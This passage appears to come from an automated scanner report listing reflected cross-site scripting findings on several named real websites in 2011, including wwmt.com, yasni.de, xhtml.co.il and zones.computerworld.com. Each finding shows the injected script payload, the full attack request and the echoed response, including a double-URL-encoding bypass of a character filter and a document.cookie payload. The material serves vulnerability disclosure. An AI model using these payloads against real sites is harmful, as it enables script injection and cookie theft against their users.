Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
Content-Length: 4098
Connection: Close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>WovenCube.com P
...[SNIP]...
<form action='/?%008d084'><script>alert(1)</script>e4f76638384=1' method='post'>
...[SNIP]...

3.134. http://www.wwmt.com/articles/calls-1387029-mubarak-friend.html97f15' [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.wwmt.com
Path:	/articles/calls-1387029-mubarak-friend.html97f15'

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload caa29%3balert(1)//b958698d1a5 was submitted in the REST URL parameter 2. This input was echoed as caa29;alert(1)//b958698d1a5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /articles/calls-1387029-mubarak-friend.html97f15'caa29%3balert(1)//b958698d1a5 HTTP/1.1
Host: www.wwmt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 13:40:42 GMT
Server: Apache
Cache-Control: no-store, no-cache, max-age=600
Pragma: no-cache
Expires: Mon, 28 Feb 2011 13:50:42 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 89211

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" xmlns:pas="
...[SNIP]...
<script type="text/javascript">
tweetmeme_url = 'http://www.wwmt.com/articles/calls-1387029-mubarak-friend.html97f15'caa29;alert(1)//b958698d1a5';
</script>
...[SNIP]...

3.135. http://www.wwmt.com/articles/calls-1387029-mubarak-friend.html97f15' [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.wwmt.com
Path:	/articles/calls-1387029-mubarak-friend.html97f15'

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 139ab"><script>alert(1)</script>0681276c1f5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /articles/calls-1387029-mubarak-friend.html97f15'139ab"><script>alert(1)</script>0681276c1f5 HTTP/1.1
Host: www.wwmt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 13:40:15 GMT
Server: Apache
Cache-Control: no-store, no-cache, max-age=600
Pragma: no-cache
Expires: Mon, 28 Feb 2011 13:50:15 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 89421

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" xmlns:pas="
...[SNIP]...
<meta property="og:url" content="http://www.wwmt.com/articles/calls-1387029-mubarak-friend.html97f15'139ab"><script>alert(1)</script>0681276c1f5"/>
...[SNIP]...

3.136. http://www.wwmt.com/articles/calls-1387029-mubarak-friend.html97f15' [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.wwmt.com
Path:	/articles/calls-1387029-mubarak-friend.html97f15'

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dbb1e"><script>alert(1)</script>a4ff7edd26e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /articles/calls-1387029-mubarak-friend.html97f15'?dbb1e"><script>alert(1)</script>a4ff7edd26e=1 HTTP/1.1
Host: www.wwmt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 13:39:27 GMT
Server: Apache
Cache-Control: no-store, no-cache, max-age=600
Pragma: no-cache
Expires: Mon, 28 Feb 2011 13:49:27 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 89094

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" xmlns:pas="
...[SNIP]...
<meta property="og:url" content="http://www.wwmt.com/articles/calls-1387029-mubarak-friend.html97f15'?dbb1e"><script>alert(1)</script>a4ff7edd26e=1"/>
...[SNIP]...

3.137. http://www.yasni.de/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yasni.de
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cab5b"><script>alert(1)</script>a8329170866 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?cab5b"><script>alert(1)</script>a8329170866=1 HTTP/1.1
Host: www.yasni.de
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 13:39:13 GMT
Server: Apache/2.2.14 (Ubuntu)
Set-Cookie: PHPSESSID=shr8ma08mdlhgi8i49uj7d9ue6kai8uu; expires=Mon, 28-Feb-2011 14:03:13 GMT; path=/; HttpOnly
X-hostname: bl06.yasni.de
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 37092

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8"
...[SNIP]...
<a href="http://www.yasni.com/?cab5b"><script>alert(1)</script>a8329170866=1" id="region_selector_1">
...[SNIP]...

3.138. http://xhtml.co.il/he/page-700/jQuery [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://xhtml.co.il
Path:	/he/page-700/jQuery

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 4875e'><script>alert(1)</script>fe07f366f0d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /he/page-700/jQuery?4875e'><script>alert(1)</script>fe07f366f0d=1 HTTP/1.1
Host: xhtml.co.il
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 13:39:28 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_perl/2.0.4 Perl/v5.8.8
X-Powered-By: PHP/5.2.9
Pragma: public
Cache-Control: maxage=5184000
Expires: Fri, 29 Apr 2011 13:39:28 GMT
Set-Cookie: PHPSESSID=7949d667394eedf5da9a520aefd255ec; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 66032

<!DOCTYPE html>
<html lang="he"><head>
<title>jQuery - ...... ........ XHTML</title>
<meta name="description" content="jQuery - ...... ........ XHTML" />
<meta charset="utf-8">
<meta name="verify-v1"
...[SNIP]...
<link rel='index' title='jQuery' href='http://xhtml.co.il//he/page-700/jQuery?4875e'><script>alert(1)</script>fe07f366f0d=1' />
...[SNIP]...

3.139. http://xhtml.co.il/ru/page-1013/jQuery.browser [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://xhtml.co.il
Path:	/ru/page-1013/jQuery.browser

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 4a704'><script>alert(1)</script>1075a16881 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ru/page-1013/jQuery.browser?4a704'><script>alert(1)</script>1075a16881=1 HTTP/1.1
Host: xhtml.co.il
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 13:39:33 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_perl/2.0.4 Perl/v5.8.8
X-Powered-By: PHP/5.2.9
Pragma: public
Cache-Control: maxage=5184000
Expires: Fri, 29 Apr 2011 13:39:33 GMT
Set-Cookie: PHPSESSID=7b4853fcafc30ca19b6627c146c060df; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 78411

<!DOCTYPE html>
<html lang="ru"><head>
<title>...................... jQuery/jQuery.browser - .......... XHTML</title>
<meta name="description" content="...................... jQuery/jQuery.browser - .
...[SNIP]...
<link rel='index' title='...................... jQuery/jQuery.browser' href='http://xhtml.co.il//ru/page-1013/jQuery.browser?4a704'><script>alert(1)</script>1075a16881=1' />
...[SNIP]...

3.140. http://ziggymedia.go2cloud.org/aff_c [source parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ziggymedia.go2cloud.org
Path:	/aff_c

Issue detail

The value of the source request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2909d"><script>alert(1)</script>fa825e2f9af was submitted in the source parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /aff_c?offer_id=24&aff_id=1001&source=js_sound2909d"><script>alert(1)</script>fa825e2f9af&url_id=4 HTTP/1.1
Host: ziggymedia.go2cloud.org
Proxy-Connection: keep-alive
Referer: http://www.acelacomm.com/?epl=w58VndtRmVfVCfESVTOnHfQfKgdAQuEUyV38Udadr44INDdmKBIgWHLMrp42LeGXWECYgt5kZyVVihOljr0JdwvxYqsLk931uomhCTow3nMU7Ak0sMMEwlM6ISIbV76HxGrNemSgkTaaeogYPUVQY2igNml66qkZTRF1ACAQ3Oe_AADgfgUAAECAWwkAAP2HygFZUyZZQTE2aFpCfwAAAPA
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: aff_ran_url_24=2; aff_session_24=4-102bc0dcefe04a1d46554d1de1f877-1001-24-2-0-0-0-US-3-_-_-_-_-_-_-173.193.214.243-20110228082415-http%3A%2F%2Fwww.acelacomm.com%2F%3Fepl%3Dw58VndtRmVfVCfESVTOnHfQfKgdAQuEUyV38Udadr44INDdmKBIgWHLMrp42LeGXWECYgt5kZyVVihOljr0JdwvxYqsLk931uomhCTow3nMU7Ak0sMMEwlM6ISIbV76HxGrNemSgkTaaeogYPUVQY2igNml66qkZTRF1ACAQ3Oe_AADgfgUAAECAWwkAAP2HygFZUyZZQTE2aFpCfwAAAPA-

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html
Date: Mon, 28 Feb 2011 13:25:22 GMT
Expires: Sat, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Server: nginx/0.9.3
Content-Length: 623
Connection: keep-alive

<html><head><style>body{background: white;} input {font-size:25px;} form{margin-top: 50px;}</style></head><body onload="document.getElementById('go').submit();"><center><form action="/aff_r" method="G
...[SNIP]...
<input type="hidden" name="url" value="http://weekly-prizes.com/?aff=154&subid=js_sound2909d"><script>alert(1)</script>fa825e2f9af&pop=0&sound=0&sid=1001" />
...[SNIP]...

3.141. http://ziggymedia.go2cloud.org/aff_r [aff_id parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ziggymedia.go2cloud.org
Path:	/aff_r

Issue detail

The value of the aff_id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 53a8a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e8f58d388472 was submitted in the aff_id parameter. This input was echoed as 53a8a"><script>alert(1)</script>8f58d388472 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /aff_r?offer_id=24&aff_id=100153a8a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e8f58d388472&url=http%3A%2F%2Fweekly-prizes.com%2F%3Faff%3D154%26subid%3D%26pop%3D0%26r%3D1%26sound%3D1%26sid%3D1001 HTTP/1.1
Host: ziggymedia.go2cloud.org
Proxy-Connection: keep-alive
Referer: http://www.acelacomm.com/?epl=w58VndtRmVfVCfESVTOnHfQfKgdAQuEUyV38Udadr44INDdmKBIgWHLMrp42LeGXWECYgt5kZyVVihOljr0JdwvxYqsLk931uomhCTow3nMU7Ak0sMMEwlM6ISIbV76HxGrNemSgkTaaeogYPUVQY2igNml66qkZTRF1ACAQ3Oe_AADgfgUAAECAWwkAAP2HygFZUyZZQTE2aFpCfwAAAPA
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: aff_ran_url_24=2; aff_session_24=4-102bc0dcefe04a1d46554d1de1f877-1001-24-2-0-0-0-US-3-_-_-_-_-_-_-173.193.214.243-20110228082415-http%3A%2F%2Fwww.acelacomm.com%2F%3Fepl%3Dw58VndtRmVfVCfESVTOnHfQfKgdAQuEUyV38Udadr44INDdmKBIgWHLMrp42LeGXWECYgt5kZyVVihOljr0JdwvxYqsLk931uomhCTow3nMU7Ak0sMMEwlM6ISIbV76HxGrNemSgkTaaeogYPUVQY2igNml66qkZTRF1ACAQ3Oe_AADgfgUAAECAWwkAAP2HygFZUyZZQTE2aFpCfwAAAPA-

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html
Date: Mon, 28 Feb 2011 13:25:02 GMT
Expires: Sat, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Server: nginx/0.9.3
Content-Length: 619
Connection: keep-alive

<html><head><style>body{background: white;} input {font-size:25px;} form{margin-top: 50px;}</style></head><body onload="document.getElementById('go').submit();"><center><form action="/aff_r" method="G
...[SNIP]...
<input type="hidden" name="aff_id" value="100153a8a"><script>alert(1)</script>8f58d388472" />
...[SNIP]...

3.142. http://ziggymedia.go2cloud.org/aff_r [offer_id parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ziggymedia.go2cloud.org
Path:	/aff_r

Issue detail

The value of the offer_id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 14e7e%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb4005ce2169 was submitted in the offer_id parameter. This input was echoed as 14e7e"><script>alert(1)</script>b4005ce2169 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /aff_r?offer_id=2414e7e%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb4005ce2169&aff_id=1001&url=http%3A%2F%2Fweekly-prizes.com%2F%3Faff%3D154%26subid%3D%26pop%3D0%26r%3D1%26sound%3D1%26sid%3D1001 HTTP/1.1
Host: ziggymedia.go2cloud.org
Proxy-Connection: keep-alive
Referer: http://www.acelacomm.com/?epl=w58VndtRmVfVCfESVTOnHfQfKgdAQuEUyV38Udadr44INDdmKBIgWHLMrp42LeGXWECYgt5kZyVVihOljr0JdwvxYqsLk931uomhCTow3nMU7Ak0sMMEwlM6ISIbV76HxGrNemSgkTaaeogYPUVQY2igNml66qkZTRF1ACAQ3Oe_AADgfgUAAECAWwkAAP2HygFZUyZZQTE2aFpCfwAAAPA
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: aff_ran_url_24=2; aff_session_24=4-102bc0dcefe04a1d46554d1de1f877-1001-24-2-0-0-0-US-3-_-_-_-_-_-_-173.193.214.243-20110228082415-http%3A%2F%2Fwww.acelacomm.com%2F%3Fepl%3Dw58VndtRmVfVCfESVTOnHfQfKgdAQuEUyV38Udadr44INDdmKBIgWHLMrp42LeGXWECYgt5kZyVVihOljr0JdwvxYqsLk931uomhCTow3nMU7Ak0sMMEwlM6ISIbV76HxGrNemSgkTaaeogYPUVQY2igNml66qkZTRF1ACAQ3Oe_AADgfgUAAECAWwkAAP2HygFZUyZZQTE2aFpCfwAAAPA-

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html
Date: Mon, 28 Feb 2011 13:24:55 GMT
Expires: Sat, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Server: nginx/0.9.3
Content-Length: 619
Connection: keep-alive

<html><head><style>body{background: white;} input {font-size:25px;} form{margin-top: 50px;}</style></head><body onload="document.getElementById('go').submit();"><center><form action="/aff_r" method="G
...[SNIP]...
<input type="hidden" name="offer_id" value="2414e7e"><script>alert(1)</script>b4005ce2169" />
...[SNIP]...

3.143. http://ziggymedia.go2cloud.org/aff_r [url parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ziggymedia.go2cloud.org
Path:	/aff_r

Issue detail

The value of the url request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7e33e"><script>alert(1)</script>72b176da3b7 was submitted in the url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /aff_r?offer_id=24&aff_id=1001&url=http%3A%2F%2Fweekly-prizes.com%2F%3Faff%3D154%26subid%3D%26pop%3D0%26r%3D1%26sound%3D1%26sid%3D10017e33e"><script>alert(1)</script>72b176da3b7 HTTP/1.1
Host: ziggymedia.go2cloud.org
Proxy-Connection: keep-alive
Referer: http://www.acelacomm.com/?epl=w58VndtRmVfVCfESVTOnHfQfKgdAQuEUyV38Udadr44INDdmKBIgWHLMrp42LeGXWECYgt5kZyVVihOljr0JdwvxYqsLk931uomhCTow3nMU7Ak0sMMEwlM6ISIbV76HxGrNemSgkTaaeogYPUVQY2igNml66qkZTRF1ACAQ3Oe_AADgfgUAAECAWwkAAP2HygFZUyZZQTE2aFpCfwAAAPA
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: aff_ran_url_24=2; aff_session_24=4-102bc0dcefe04a1d46554d1de1f877-1001-24-2-0-0-0-US-3-_-_-_-_-_-_-173.193.214.243-20110228082415-http%3A%2F%2Fwww.acelacomm.com%2F%3Fepl%3Dw58VndtRmVfVCfESVTOnHfQfKgdAQuEUyV38Udadr44INDdmKBIgWHLMrp42LeGXWECYgt5kZyVVihOljr0JdwvxYqsLk931uomhCTow3nMU7Ak0sMMEwlM6ISIbV76HxGrNemSgkTaaeogYPUVQY2igNml66qkZTRF1ACAQ3Oe_AADgfgUAAECAWwkAAP2HygFZUyZZQTE2aFpCfwAAAPA-

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html
Date: Mon, 28 Feb 2011 13:25:06 GMT
Expires: Sat, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Server: nginx/0.9.3
Content-Length: 619
Connection: keep-alive

<html><head><style>body{background: white;} input {font-size:25px;} form{margin-top: 50px;}</style></head><body onload="document.getElementById('go').submit();"><center><form action="/aff_r" method="G
...[SNIP]...
<input type="hidden" name="url" value="http://weekly-prizes.com/?aff=154&subid=&pop=0&r=1&sound=1&sid=10017e33e"><script>alert(1)</script>72b176da3b7" />
...[SNIP]...

3.144. http://zjmps.com/click/ [a parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://zjmps.com
Path:	/click/

Issue detail

The value of the a request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aaffd"><script>alert(1)</script>4fa49262733 was submitted in the a parameter. This input was echoed as aaffd\\\"><script>alert(1)</script>4fa49262733 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /click/?a=154aaffd"><script>alert(1)</script>4fa49262733&o=518&c1=js_sound2909d\ HTTP/1.1
Host: zjmps.com
Proxy-Connection: keep-alive
Referer: http://weekly-prizes.com/?aff=154&subid=js_sound2909d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Efa825e2f9af&pop=0&sound=0&sid=1001
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 14:21:05 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=c8675355739d1755a2b61ee584344b92; path=/
Set-Cookie: click_id518=44304396; expires=Tue, 01-Mar-2011 14:21:05 GMT; path=/
Set-Cookie: checksum518=56c9945d2b40c3166882db1360344b0b; expires=Tue, 01-Mar-2011 14:21:05 GMT; path=/
Content-Type: text/html
Content-Length: 135

<meta http-equiv="refresh" content="0;url=http://weekly-prizes.com/1.php?c=us&subid=154aaffd\\\"><script>alert(1)</script>4fa49262733">

3.145. http://zones.computerworld.com/ncircle/registration.php [from parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://zones.computerworld.com
Path:	/ncircle/registration.php

Issue detail

The value of the from request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cf4cf"><script>alert(1)</script>8127f6b53d2 was submitted in the from parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ncircle/registration.php?from=cf4cf"><script>alert(1)</script>8127f6b53d2&src=csozne&tab=1&item=5 HTTP/1.1
Host: zones.computerworld.com
Proxy-Connection: keep-alive
Referer: http://www.csoonline.com/solution-centers/ncircle?item=5&tab=1&from=cso&src=csozne
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 12:45:08 GMT
Server: Apache/2.2.3 (CentOS) DAV/2 PHP/5.1.6 mod_python/3.2.8 Python/2.4.3 mod_perl/2.0.4 Perl/v5.8.8
X-Powered-By: PHP/5.1.6
Cteonnt-Length: 2152
Cneonction: close
Content-Type: text/html; charset=UTF-8
Cache-Control: private
Content-Length: 2152

<style type="text/css">
   @import url("/scripts/css.css");
</style>

<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//EN\" http://www.w3.org/TR/html4/loose.dtd>
<html>
   <head>
   <met
...[SNIP]...
<iframe name="good" class="registration_iframe" src="http://www.accelacomm.com/jlp/csozne/10/50552781/_from=cf4cf"><script>alert(1)</script>8127f6b53d2" width="930" height="1000" border="0" frameborder="0" scrolling="no" onload="scrollit();">
...[SNIP]...

3.146. http://zones.computerworld.com/ncircle/registration.php [from parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://zones.computerworld.com
Path:	/ncircle/registration.php

Issue detail

The value of the from request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6566b'%3balert(1)//04743b660f0 was submitted in the from parameter. This input was echoed as 6566b';alert(1)//04743b660f0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ncircle/registration.php?from=cso6566b'%3balert(1)//04743b660f0&src=csozne&tab=1&item=5 HTTP/1.1
Host: zones.computerworld.com
Proxy-Connection: keep-alive
Referer: http://www.csoonline.com/solution-centers/ncircle?item=5&tab=1&from=cso&src=csozne
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 12:45:10 GMT
Server: Apache/2.2.3 (CentOS) DAV/2 PHP/5.1.6 mod_python/3.2.8 Python/2.4.3 mod_perl/2.0.4 Perl/v5.8.8
X-Powered-By: PHP/5.1.6
Cteonnt-Length: 2128
Cneonction: close
Content-Type: text/html; charset=UTF-8
Cache-Control: private
Content-Length: 2128

<style type="text/css">
   @import url("/scripts/css.css");
</style>

<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//EN\" http://www.w3.org/TR/html4/loose.dtd>
<html>
   <head>
   <met
...[SNIP]...

...[SNIP]...

3.147. http://zones.computerworld.com/ncircle/registration.php [src parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://zones.computerworld.com
Path:	/ncircle/registration.php

Issue detail

The value of the src request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f163e"><script>alert(1)</script>0815371cdeb was submitted in the src parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ncircle/registration.php?from=cso&src=f163e"><script>alert(1)</script>0815371cdeb&tab=1&item=5 HTTP/1.1
Host: zones.computerworld.com
Proxy-Connection: keep-alive
Referer: http://www.csoonline.com/solution-centers/ncircle?item=5&tab=1&from=cso&src=csozne
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
